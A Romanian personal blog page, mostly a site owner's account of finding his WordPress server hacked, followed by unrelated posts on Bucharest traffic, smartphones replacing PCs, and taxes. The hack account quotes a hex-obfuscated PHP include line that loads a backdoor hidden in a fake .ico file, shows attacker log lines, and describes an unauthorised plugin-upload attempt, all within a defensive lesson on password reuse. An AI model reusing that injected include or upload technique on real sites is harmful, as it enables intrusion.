Salut!

Repet ce am scris in titlu:

  • Schimbati-va parolele periodic!
  • Nu folositi aceeasi parola pe mai multe site-uri!
  • Aveti parole diferite dupa gradul de risc!

Am fost hack-uit. In sfarsit as zice!

Zic “in sfarsit” pentru ca acum 10-15 ani cand m-am decis sa folosesc aceeasi parola peste tot, mi-am zis ca “ce poate merge rau?“. Au trecut ani, nimic rau nu s-a intamplat, am zis ca e totul ok.

Doar ca azi mi-am dat seama ca am o linie dubioasa in fiecare index.php de pe server.

  • `@include “\x2fhome\x2fadmi \x6e/web\x2fmflo \x72in.c\x6fm /pu\x62lic_\x68tml /\x74est_\x6aasny\x5fsso /\x6aasny\x5fsso /\x2edfbf\x34896.\x69co”;`
  • Care s-ar transforma intr-un `@include “/home/admin /web/mflorin.com /public_html/test_jasny_sso /jasny_sso /.dfbf4896.ico”;`

Deschid acel fisier .ico (care de fapt avea un cod php in el, dar “criptat” destul de mult), imi dau seama ca ceva naspa s-a intamplat.

Dau vina pe wordpress sau vreo tema ori plugin cu probleme.

Investighez putin si-mi dau seama de prin loguri ca cineva a reusit sa se logheze prin FTP si a uploadat un fisier undeva

  • Din `cat /var/log/vsftpd.log | grep “] OK”` a rezultat o linie “interesanta”: `[admin] OK UPLOAD: Client “5.8.48.72”, “/web/mflorin.com/public_html/logon/lfwxkjn.php”, 67628 bytes, 123.91Kbyte/sec`

Ma uit la fisier, era un fel de webconsole. Zic ca e ok, a fost cumva “direct / de mana” hack-ul, nu gen vreun virus sau ceva (care, in mintea mea, poate face mai mult rau).

Iau IP-ul, il bag in fail2ban si merg mai departe. Zic hai sa ma uit si la logurile de fail2ban. Vad o gramada de brute force-uri pe ssh. Ma uit si la logurile de mysql, la fel. Zic ca nu mai are rost sa bag in lista de ip-uri banate ca sunt prea multe.

Intre timp imi dau seama ca merge greu serverul (lag?). Un htop imi spune ca apache-ul ia 99% din cpu. Wtf?

Ma uit cu un tail -f in logurile de la apache, vad tone de mesaje de genul `42.51.194.16 – – [24/May/2018:21:41:32 +0300] “POST /xmlrpc.php HTTP/1.0” 200 451 “-” “Apache-HttpClient/4.5.2 (Java/1.8.0_151)”` Brute force in wordpress, dar de pe alt ip. Unul era de prin PL, altul de prin China. Ma gandesc ca nu au treaba unul cu altul.

Doar de pe acel IP se facea trafic, il bag in fail2ban, scade load-ul de la 99% la sub 1%. Nice one. Noroc ca se dadea doar de pe 1 IP.

Opresc serviciul de vsftpd, ca oricum nu-l foloseam, fac regula in firewall sa ma pot conecta doar de pe IP-ul meu la ssh, blochez si accesul spre porturile de FTP, mai fac ceva tweak pe ici pe colo.

Intru in WP, si vad pe pagina de Users Online (care iti arata IP-urile userilor, pe ce pagina sunt, si eventual cu ce user sunt logati, daca sunt) ca erau 2 useri logati, eu si inca unul, test.

Ce puii mei? Nu exista nici un test pe blog.

Ma uit in Users, vad ca e un user test creat in 2009 pe adresa de email test@darky14.com. (note: darky14.com era fostul domeniu, care a fost migrat pe acesta).

Incerc sa ma loghez cu username test si password test si wtf?? MERGE!! Soooo stupid! :|

Ma rog, userul avea drepturi doar de Subscriber (deci nu putea face mare chestie (so I thought!))

Ii iau IP-ul. e de China. Intru pe darky14.com, vad ca e ceva in chineza pe el. E o legatura.

Ii dau un `tail /var/log/apache2/domains/mflorin.com.log -n 1000 | grep 163.172.127.238` si uite chestie:

  • 163.172.127.238 – – [24/May/2018:23:14:56 +0300] “GET /wp-login.php HTTP/1.0″ 200 5876 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”
  • 163.172.127.238 – – [24/May/2018:23:14:57 +0300] “POST /wp-login.php HTTP/1.0″ 302 1452 “http://mflorin.com/wp-login.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”
  • 163.172.127.238 – – [24/May/2018:23:14:58 +0300] “POST /wp-admin/update.php?action=upload-plugin HTTP/1.0″ 500 3190 “http://mflorin.com/wp-admin/theme-install.php?tab=upload” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”
  • 163.172.127.238 – – [24/May/2018:23:14:58 +0300] “GET /wp-content/uploads/sup_wp.php HTTP/1.0″ 404 82075 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”
    163.172.127.238 – – [24/May/2018:23:14:58 +0300] “GET /wp-content/uploads/2016/12/sup_wp.php HTTP/1.0″ 404 82211 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36”

Pe scurt, chiar daca nu ai drept de admin, daca esti logat in magnificul wordpress si faci niste POST-uri magice pe wp-admin/update.php, poti uploada ce fisiere vrei tu!.
Da, fie, a dat 500 pe POST si 404 pe GET-urile pe fisiere dupa aia, dar putea fi mai rau!

Fucking awesome!

Intru repede, fac update la WP, intru pe user, schimb parola, schimb email-ul, bag userul in banlist, etc.

Faza dura. WP-ul, cand schimbi parola sau email-ul din backend-ul lor, trimite mail de notificare pe adresa veche.

Ma uit in loguri si vad:

 

Wtf? Tocmai ce i-am trimis omului ce m-a hackuit un mail in care i-am spus ca i-am schimbat parola? Bravo Florin! Bravo.

 

Anyway, omul stia parola de la userul de ftp in plain text.

As spune ca partea funny e ca aceeasi parola era si la mysql si la ssh si in mai multe locuri, dar mi-e sa nu fac mai rau (daca intra chinezul si da translate aici si zice “hai sa incerc si intr-un mysql sau ssh aceeasi parola sa vad ce se intampla”.

 

Din ce vad, in ultimul timp, se incearca din ce in ce mai des brute force. Ori sunt eu luat in vizor, ori chestia asta e mai des intalnita azi decat acum cativa ani in urma.

De-aia e bine ca existe parole diferite la servicii (mysql), ssh sa fie IP based (si KEY based, nu password based), FTP daca nu e folosit, dezactivat, etc.

 

 

Sooooo,

Ca si nota de final….

 

 

 

NEVER EVER EVER EVER PUT THE SAME PASSWORD FOR MULTIPLE SERVICES IN A SERVER!!!!

 

 

Si ca sa nu credeti ca sunt atat de stupid, da, am parole diferite pe nivele de securitate, ceea ce va recomand si voua sa aveti. Poate ca e mega dificil sa aveti cate o parola diferita pentru fiecare cont, dar macar sa aveti 3-4 parole (de la usoara (usor de tastat) la foarte grea (poate ceva mai greu de tastat)) pe nivele de securitate.

Parola de la ING nu o puneti la fel ca cea de la filelist.ro.

Parola cu care va inregistrati pe un site dubios, nu o puneti ca cea de la filelist.ro. Oricine din partea cealalta poate face o baza de date cu combinatii de username + password, si maine va treziti ca nu mai aveti nici un cont (furt de identitate online).

Nah, penibil din partea mea sa spun asta, dar, aveti grija la parole!

Acum ma scuzati, am de schimbat parolele la o gramada de servere si servicii si configi, etc… Hard work :(

Have fun, si daca va duce capul la prostii, ca am pus calea pe server, username-ul, etc… DON’T!

Ah, si inca ceva. Daca renuntati la un domeniu (sau adresa de email), aveti mare mare grija sa nu uitati sa va schimbati adresa de email din cea veche in cea noua prin toate locurile unde ati fi putut s-o folositi (note: sigur veti uita intr-un loc, si se va intoarce impotriva voastra, peste vreo 10 ani asa :)) )

Plecasem de la munca la ora 19 (o ora acceptabila pentru traficul din Bucuresti zic), nici nu apucasem sa ies din parcare ca deja eram blocat. Intru pe Waze, imi zice 45min pentru 3.9 km. Stau vreo 10 min nemiscat, ma supar si ma intorc inapoi in parcare, urc la birou. Poate pe la 20-21 plec si eu de la munca.

O injur un pic pe Firea ca a promis din 2012 ca face pasaj pe sub calea ferata de pe Petricani, ma enervez si-mi zic ca ar fi bine sa plec din tara asta, ca astia de la putere isi bat joc de noi, si eu nu vreau sa accept asa ceva.

*Ca o paranteza, au trecut vreo 30 min de atunci, si INCA se aud trenuri in departare!!!

Intre timp stau si ma gandesc… Oare doar la noi o fi asa? Nu stiu cum e prin alte parti, n-am locuit in afara tarii, in zone bune dpdv IT (unde se gasesc si joburi faine in domeniu), dar incep sa ma gandesc ca se poate sa nu fie mai bine, ba chiar sa fie mai rau.

Aici am 3.9 km pana acasa si le fac in 45 min, ba chiar peste 1 ora in zilele rele (vineri seara?). Dar prin alte parti se poate sa locuiesc la 20 km de munca, si sa le fac in mai bine de 1h (sau poate chiar si 2h).

Note: Fara comentarii ca acesti 3.9 km ii poti face si pe jos, ca in marea majoritate a timpului ii fac in sub 10 min, eu vorbesc acum de momentele alea ciudate cand nu nimeresti ora “potrivita”

Mereu compar Bucuresti cu Galati (de unde am plecat) si incep sa vad din ce in ce mai putine avantaje ale Bucurestiului.

In Galati n-ai de munca, si ce ai is chestii ce nu vrei sa faci. In Bucuresti ai de munca, dar vin la pachet cu niste chestii super super naspa.

Ahh, abia astept viitorul (sper eu apropiat) cand or sa existe din ce in ce mai multe joburi remote, sa pot locui unde vreau eu, si sa am parte si de un job fain.

Dar pana atunci, o injur pe Firea in fiecare fucking zi cand ma duc si ma intorc de la munca, pentru ca e o mincinoasa care promite proiecte si deadline-uri si nu se tine de ele! Nu poti sa spui ca faci ceva si sa nu faci. NU POTI! Nu se poate asa ceva. Ar trebui sa fie pacat capital, sa se pedepseasca cu inchisoarea, dat afara, batjocorit in strada, habar n-am, dar nu se accepta asa ceva.

* Mai bag o linie de cod, mai o muzica, mai o linie aici, trec 50 minute, si INCA se aud trenuri in departare…

In alta ordine de idei, sa nu spuneti ca Dacia nu face masini bune, ca se exporta IN DRACI.
Aproape in fiecare zi in jur de ora 11 trec trenuri de kilometri lungime care transporta Dacii (probabil spre CT, sa fie exportate).

Faza proasta e ca aceste trenuri merg cu 3 km/h si le iau 30 min sa treaca pe acolo. Ba chiar uneori dau si inapoi. Eu chiar cred ca cineva face aceste lucruri sa-si bata joc de noi. Pe bune, altfel nu-mi explic cum poate sa opreasca trenul fix la ora “aia” si fix la trecerea “aia”. Sa opreasca, sa dea putin inapoi, si dupa sa plece mai departe. Pe post de “haa, fraierilor, uitati-va la mine cum fac misto de zeci de mii de oameni. In fiecare zi. haaaa, ce fraieri sunteti…”
Si nu cumva sa treaca la alta ora. La ora 10-11 si la ora 18-19. Cele mai potrivite ore sa plece toate trenurile in acelasi timp, unul dupa altul.

La un moment dat am avut “norocul” sa fiu primul la calea ferata si am si filmat un pic (atasez mai jos filmarea).

Tags:

Zilele trecute un coleg si-a cumparat un telefon cu 6 GB de ram si CPU de 2.5 GHz cu 8 cores.

Si ma gandeam ca eu cunosc foarte multe persoane care inca mai au pc-uri cu mai putin de 6 GB ram si poate chiar si CPU mai mic de 2.5 GHz, clar cu mai putin de 8 core (multe chiar cu 1 max 2).

Si le folosesc pentru cel mult Facebook, e-mail si YouTube. Mai putin YouTube ca nu prea mai merge YouTube pe pc-urile mai vechi.

Ok, poate ca per total performanta nu e aceeasi. Ma refer ca un CPU dual core de PC la 2 GHz e probabil mai performant decat un CPU quad core de 2.2 GHz de laptop, si ambele sunt mai performante decat un CPU octa core de smartphone la 2.6 Ghz. Tine si de marimea fizica a procesorului, nu doar de cifre.

Pe de alta parte, un CPU, fie el de smartphone, fabricat in tehnologie de 14 nm, poate fi mai performant decat un CPU de desktop dual core fabricat la 90 nm. Poate, daca nu sigur. Cel putin in aplicatiile moderne, care stiu sa beneficieze de tehonologii si instructiuni noi.

Va las mai jos un video prezentand Samsung DeX (Desktop Experience). Uitati-va la el, chiar si click-uind prin video pana la final.

Se prezinta un telefon modern (Samsung Galaxy S8).

Partea faina e ca il poti conecta direct la un monitor si gata, ai in fata un mini PC.

Ai browser, ai facebook, ai youtube, poti face lejer playback la filme FullHD, multi tabs in browser, aplicatii Office (fie ele pachetul Microsoft Office, fie prin Google Docs).

Ca idee, ai tot ce foloseste marea majoritatea a oamenilor.

Acum te intreb: daca tu pe pc-ul, laptopul sau tableta ta (la plural poate), nu folosesti mai mult decat aplicatiile sus mentionate, de ce inca mai detii PC, laptop, tableta (chiar mai mult de 1 din fiecare)?

Iti zic eu de ce: Din cauza marketing-ului.

Cineva inca nu a reusit sa-ti vanda ideea asta.

De fapt cam nimeni nu incearca sa vanda ideea asta.
Pentru ca e ieftina.
De ce sa cumperi si sa faci upgrade doar la 1 telefon si 1 monitor, cand poti cumpara si upgrada odata la 1-2 ani mai multe device-uri?
Un PC de gaming, 1 monitor gaming (adica scump), 1 laptop ultra book (iarasi scump), smartphonuri, si cateva tablete, ca poate uneori smartphonul e prea mic si laptopul prea mare.

Poate ca tu nu te joci, dar cineva ti-a vandut ideea ca merita un PC de gaming. Poate ca tu nu ai nevoie de laptop super subtire, dar cineva printr-o reclama ceva a reusit sa te convinga de utilitatea unui laptop super subtire, pe care tu nu-l scoti afara din casa decat prin concedii, cand sta aruncat prin bagaje.

Dar undeva in viitor probabil lucrurile astea se vor diminua, majoritatea oamenilor nu vor mai detine PC-uri, laptopuri, tablete si o gramada de telefoane, ci vor detine 1 si bun.
Acum depinde doar de cat de mult ne vom destepta, nu vom mai cumpara chestii aiurea, si ne vom da seama ca ne trebuie doar 1 singur lucru sa ne facem treaba.

Si apropo, nu exista notiunea de “M-am obisnuit cu Windows, nu pot trece la altceva“. Nu treci la altceva, nu folosesti altceva (gen un smartphone cu desktop experience) pentru ca cineva inca nu ti-a spus ca se poate.

Si cum What’sApp poate fi folosit pe web.whatsapp.com fara ca telefonul sa fie “blocat” adica poti sta si pe telefon in acelasi timp, asa probabil vei putea folosi simultan telefonul la ce vrei, si pe un monitor sa poti folosi un Desktop Experience, cu puterea acelui telefon. Wireless zic, cablurile sunt demodate de ceva vreme.

In final, ca tot ziceam de YouTube ca nu mai functioneaza bine pe pc-urile mai vechi. Asta e din cauza tehnologiilor noi de fabricatie a componentelor. Ca sa tii pasul, chiar si cu YouTube si Facebook, trebuie sa faci upgrade la +- 5 ani. La ORICE device ai avea.
Dar la telefon oricum faci upgrade des. Gandeste-te ce putere ai in buzunar si cat de multe poti face cu acel mic device.

Cel putin ca idee, realizeaza cum va arata viitorul si pregateste-te sa fii printre primii care vor beneficia dupa urma acestor lucruri: renunta la PC, laptop, tablete etc, cat de repede e posibil. Fii printre pionierii folosirii puterii de calcul la dimensiuni mici! Nu mai da multi bani pe multe device-uri nefolositoare. Ia-ti unul si bun! Mai trebuie sa astepti pentru asta, dar fii mereu pe faza pentru cand vei putea implementa lucrurile astea in viata ta!
Cand zic sa fii primul, zic sa incepi sa folosesti asta, chiar daca nimeni nu o face. Chiar daca lumea va rade de tine. Tu stii ca si ei se vor adapta la un moment data!

Google sunt inteligenți. Sau nu. Pe scurt. Google e un motor de căutare. Adică scrii ceva într-un input pe site-ul lor, și ei îți returnează rezultate conform căutării tale. Ca sa facă asta, ei au servicii în spate care non stop caută pe internet, ia fiecare pagină în parte, o scanează și o adaugă într-o […]

Cam asa s-ar traduce pe scurt ce se intampla la Galati cu proiectul “Unda Verde”. Sunt cateva posibilitati de ce sistemul nu merge. Ca si cu logo-ul ANAF de 70 miliarde lei (vechi), care s-ar face in 20 minute, probabil si in cazul asta, e doar o acoperire pentru a se sustrage niste bani dintr-un fond […]

Salut! Ce ciudat e! Ce ciudat se “simte” să scriu aceste rânduri. Îmi tot spun de ani de zile să renunț la acest blog, și să pun un homepage de-ăla static cu “Ăsta-s eu, asta fac, așa mă numesc, asta-mi e poza” și cam atât. Exceptând un articol acum vreo 2 ani, altul acum 3 […]

Citeam pe aici cum că Sony s-a retras din business-ul cu personal computer (mai pe românește: Sony nu mai face calculatoare d-alea vechi cu unitate centrală + monitor + tastatură și mouse) În ultimele 8 trimestre ale anilor (mai exact în ultimii 2-3 ani) toți giganții creatori de pc-uri au încasat scăderi din ce în […]

*Continuarea articolelor “Statul, cel mai mare cămătar!” și “Care-i legătura dintre Casa de asigurări de SĂNĂTATE și banii intrați în contul tău!?“. E ca și cum ar veni mafia la tine la ușă să-ți spună: Vrei să ieși din casă? Atunci dă-mi lunar 16% din veniturile tale, iar eu te voi lăsa să ieși afară […]

În ultimul articol am scris despre faptul că atunci când ai un câștig de 162 lei, ție-ți revin de fapt doar 100 lei. Restul de 62 lei se duc la stat. Asta înseamnă că aproape 40% din câștigurile tale se duc la stat. Dar nu despre asta vreau să vorbesc aici, ci despre legătura dintre […]

Să spunem că ai un câștig online de 162 lei. Ca să poți scoate banii pe card, trebuie să plătești la Casa de Asigurări de Sănătate impozitul pe venit la acei bani. De 16%. Se numește Impozit pe venit final. Bun. 16% din 162 lei înseamnă puțin peste 25 lei. Din 162 lei îți mai […]